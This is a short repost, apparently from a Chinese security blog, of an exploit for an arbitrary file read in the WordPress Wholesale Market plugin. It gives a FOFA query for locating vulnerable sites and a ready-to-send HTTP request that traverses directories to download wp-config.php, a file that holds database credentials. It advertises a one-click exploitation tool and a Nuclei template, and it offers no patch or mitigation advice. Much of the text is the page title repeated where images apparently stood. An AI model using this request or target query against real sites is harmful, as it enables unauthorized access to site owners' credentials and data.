Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

admin 2024年3月20日13:46:25评论28 views字数 707阅读2分21秒阅读模式
【Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)】

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)
资产测绘

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)
fofa:body="wp-content/plugins/wholesale-market"

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)
漏洞请求包

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)
GET /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)
漏洞利用

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)
Nuclei漏洞利用

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

 

原文始发于微信公众号(银遁安全团队):Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月20日13:46:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Wordpress_Wholesale任意文件读取(含一键利用工具+Nuclei)http://cn-sec.com/archives/2588303.html

发表评论

匿名网友 填写信息